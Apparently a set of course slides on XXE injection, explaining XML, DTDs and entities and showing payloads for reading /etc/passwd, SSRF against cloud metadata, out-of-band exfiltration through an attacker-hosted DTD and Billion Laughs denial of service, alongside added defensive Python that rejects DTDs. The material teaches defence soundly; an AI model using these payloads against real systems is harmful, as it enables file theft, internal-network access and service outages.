Injection Attacks: The Complete 2020 Guide

XXE Injections - Overview


<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

Example XML

XML

Stands for eXtensible Markup Language

XML defines a set of rules for encoding documents in a format that is both human-readable and machine-readable

...kind of like HTML

Potential impact of XXE attacks

Attackers could view files from the app server (e.g. password files)

Denial of Service (DoS) attacks

Server-Side Request Forgery (SSRF) attacks


<!DOCTYPE document[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Your app may be vulnerable if:

  • It accepts XML or XML uploads, or inserts untrusted data into XML docs
  • Document Type Definitions (aka DTDs) are enabled
  • You use SAML for identity processing since SAML uses XML
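The second bullet is the one a defender can act on directly. As an added example (not part of the course material), this Python gate refuses any untrusted document that declares a DTD before a parser ever sees it, and exercises the benign patient record and the file-retrieval and metadata payloads from these slides as constructed inputs:

```python
"""Added example (not from the course): a pre-parse gate that refuses untrusted
XML carrying a DTD, then parses the remainder with the standard library.
Entities can only be declared inside a <!DOCTYPE ...> subset, so a document
without one cannot reference a SYSTEM entity, a parameter entity or an
expansion bomb, whichever parser sits behind the gate."""
import re
import xml.etree.ElementTree as ET

# Matched anywhere, case-insensitively.  A hit inside a comment or CDATA section
# is a false positive we accept: untrusted input has no business carrying either
# keyword.  Libraries such as defusedxml apply the same policy at parser level.
_DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

class DTDNotAllowed(ValueError):
    pass

def contains_dtd(data: bytes) -> bool:
    """True if the raw bytes declare a DTD or an entity."""
    return _DTD_MARKERS.search(data) is not None

def parse_untrusted(data: bytes) -> ET.Element:
    """Parse untrusted XML, rejecting DTDs before any parser sees the input."""
    # The byte-level check assumes an ASCII-compatible encoding; UTF-16 input
    # (leading BOM FF FE or FE FF) would slip past it, so it is refused outright.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        raise DTDNotAllowed("UTF-16 input is not accepted by this gate")
    if contains_dtd(data):
        raise DTDNotAllowed("document declares a DTD or entity; rejected unparsed")
    return ET.fromstring(data)

# Sample documents, constructed from the slides above.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>"""
FILE_READ = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<document><patients><patientName>&xxe;</patientName></patients></document>"""
SSRF = b"""<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).find("patients/patientName").text)  # Christophe Limpalair
    for payload in (FILE_READ, SSRF):
        try:
            parse_untrusted(payload)
        except DTDNotAllowed as exc:
            print("rejected:", exc)
```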

DTD

DTD stands for Document Type Definition

It defines what is considered a "well-formed" and "valid" XML document


<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE patient [
   <!ELEMENT patient (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>
]>



<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE patient [
   <!ELEMENT patient (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>
]>

<patient>
   <name>Christophe Limpalair</name>
   <ssn>222-22-2222</ssn>
   <phone>(222) 123-4567</phone>
</patient>

Internal DTD


<?xml version = "1.0" encoding = "UTF-8" standalone = "no" ?>
<!DOCTYPE patient SYSTEM "patient.dtd">
<patient>
   <name>Christophe Limpalair</name>
   <ssn>222-22-2222</ssn>
   <phone>(011) 123-4567</phone>
</patient>

External DTD


   <!ELEMENT patient (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>

patient.dtd

DTD Entities

DTD Entities are kind of like variables. You can store information within those variables for later use

Entities act as references or shortcuts to data



<!ENTITY author "Christophe Limpalair">

<author>&author;</author>

Internal entity



<!DOCTYPE document SYSTEM "patients.dtd">

External entity

Type of XXE attacks

  • Retrieving files
  • Performing SSRF attacks
  • Out-of-band data exfiltration
  • Using error messages to retrieve data
  • Denial of Service attacks

Retrieving files


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document SYSTEM "patients.dtd">
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

External entity



<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<document>
  <patients>
    <patientName>&xxe;</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

External entity

Output of /etc/passwd

Performing SSRF attacks

SSRF stands for Server-Side Request Forgery

It lets an attacker make the application's server issue requests it was never intended to make, such as to internal hosts only the server can reach


HTTP request

Accessing the server's metadata

Although you can only access instance metadata and user data from within the instance itself, the data is not protected by authentication or cryptographic methods. Anyone who has direct access to the instance, and potentially any software running on the instance, can view its metadata. Therefore, you should not store sensitive data, such as passwords or long-lived encryption keys, as user data.



<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

Out-of-band data exfiltration

HTTP request




<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://example-malicious-url.com/payload.dtd">
  %dtd;
]>
<data>&send;</data>


<!ENTITY % all "<!ENTITY send SYSTEM 'http://example-malicious-url.com/?file=%file;'>">
%all;

Attacker DTD (http://example-malicious-url.com/payload.dtd)

Out-of-band data exfiltration



<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % eval '<!ENTITY % error SYSTEM "file:///fakepath/%payload;">'>
%eval;
%error;



<?xml version="1.0" encoding="UTF-8"?>
<root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///fakepath/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh...

XXE attacks via file uploads

<?xml version="1.0" encoding="utf-8"?>
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 1206 1683.699" enable-background="new 0 0 1206 1683.699" xml:space="preserve">
<g>
	<path d="M1112.582,344.294c-15.849-37.399-91.976-109.324-91.162-108.324c-21.912-26.938-23.368-32.534-32.562-46.854
		c-12.374-18.937-11.253-7.263-41.163-55.556c-10.826-17.547-52.459-29.704-58.209-32.428c-17.557-8.318-31.574-20.846-50.328-27.5
		c-45.883-16.281-95.603-15.086-142.468-26.771c-5.7-1.421-12.417-2.627-16.882,1.19c-2.827,2.417-3.92,6.225-5.596,9.548

Example SVG

DoS Attack


<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Example of Billion Laughs attack
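The danger here is the expansion ratio, not the document size: the payload above is under a kilobyte. As an added example (not from the course), this Python estimator computes how many bytes each entity expands to without ever building the string, using the slide's document as a constructed constant:

```python
"""Added example (not from the course): measure how far an entity reference
expands without actually expanding it, so the Billion Laughs document above
can be sized rather than run."""
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")

def entity_table(doc: str) -> dict:
    """Name -> literal value for each internal general entity in the DTD."""
    return dict(ENTITY_DECL.findall(doc))

def expanded_size(name: str, table: dict, memo=None, stack=()) -> int:
    """Bytes produced by fully expanding &name;, computed from the sizes of the
    entities it references instead of building the string."""
    memo = {} if memo is None else memo
    if name in stack:  # XML forbids recursive entities; treat as hostile
        raise ValueError(f"entity {name} references itself")
    if name not in memo:
        value, size, pos = table[name], 0, 0
        for ref in ENTITY_REF.finditer(value):
            size += ref.start() - pos
            size += expanded_size(ref.group(1), table, memo, stack + (name,))
            pos = ref.end()
        memo[name] = size + len(value) - pos
    return memo[name]

def amplification(doc: str) -> float:
    """Expanded size of the document body divided by the document's own size.
    libexpat 2.4 and later abort parsing once this ratio passes 100."""
    table = entity_table(doc)
    body = doc.split("]>", 1)[-1]          # content after the internal subset
    expanded = sum(expanded_size(r.group(1), table) for r in ENTITY_REF.finditer(body))
    return expanded / len(doc)

# The slide's payload, kept as a plain string so it is never fed to a parser here.
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"""
```

With nine levels of tenfold nesting, `&lol9;` expands to 300,000,000 bytes from a document of roughly 700, which is why a DTD ban or an expansion-ratio cap is the fix rather than an input size limit.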

Overview of XXE injections

By Christophe Limpalair
